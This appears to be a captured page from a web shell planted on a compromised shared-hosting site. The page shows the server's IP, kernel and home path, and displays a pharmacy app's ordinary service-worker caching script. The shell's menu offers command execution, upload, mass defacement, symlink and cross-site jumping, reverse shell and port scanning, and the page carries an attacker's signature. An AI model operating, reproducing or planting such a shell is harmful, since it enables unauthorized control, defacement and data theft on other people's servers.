Tul xxx Tul
User / IP
:
216.73.216.217
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
farmaciaprobar
/
Viewing: sw.js
const APP_PREFIX = 'farmacia-pwa'; const VERSION = 'v1'; const CACHE_NAME = `${APP_PREFIX}-${VERSION}`; const FILES_TO_CACHE = [ './', './login', './manifest.webmanifest', './img/logo.png', './assets/dist/css/adminlte.min.css', './assets/plugins/bootstrap/js/bootstrap.bundle.min.js', './assets/plugins/jquery/jquery.min.js' ]; self.addEventListener('install', (event) => { event.waitUntil( caches.open(CACHE_NAME).then((cache) => cache.addAll(FILES_TO_CACHE)) ); self.skipWaiting(); }); self.addEventListener('activate', (event) => { event.waitUntil( caches.keys().then((keys) => Promise.all( keys.filter((key) => key.startsWith(APP_PREFIX) && key !== CACHE_NAME) .map((key) => caches.delete(key)) )) ); self.clients.claim(); }); self.addEventListener('fetch', (event) => { if (event.request.method !== 'GET') { return; } event.respondWith( caches.match(event.request).then((cached) => { if (cached) { fetch(event.request).then((response) => { caches.open(CACHE_NAME).then((cache) => cache.put(event.request, response.clone())); }).catch(() => null); return cached; } return fetch(event.request) .then((response) => { const clone = response.clone(); caches.open(CACHE_NAME).then((cache) => cache.put(event.request, clone)); return response; }) .catch(() => caches.match('./')); // fallback to login shell }) ); });
Coded With 💗 by
0x6ick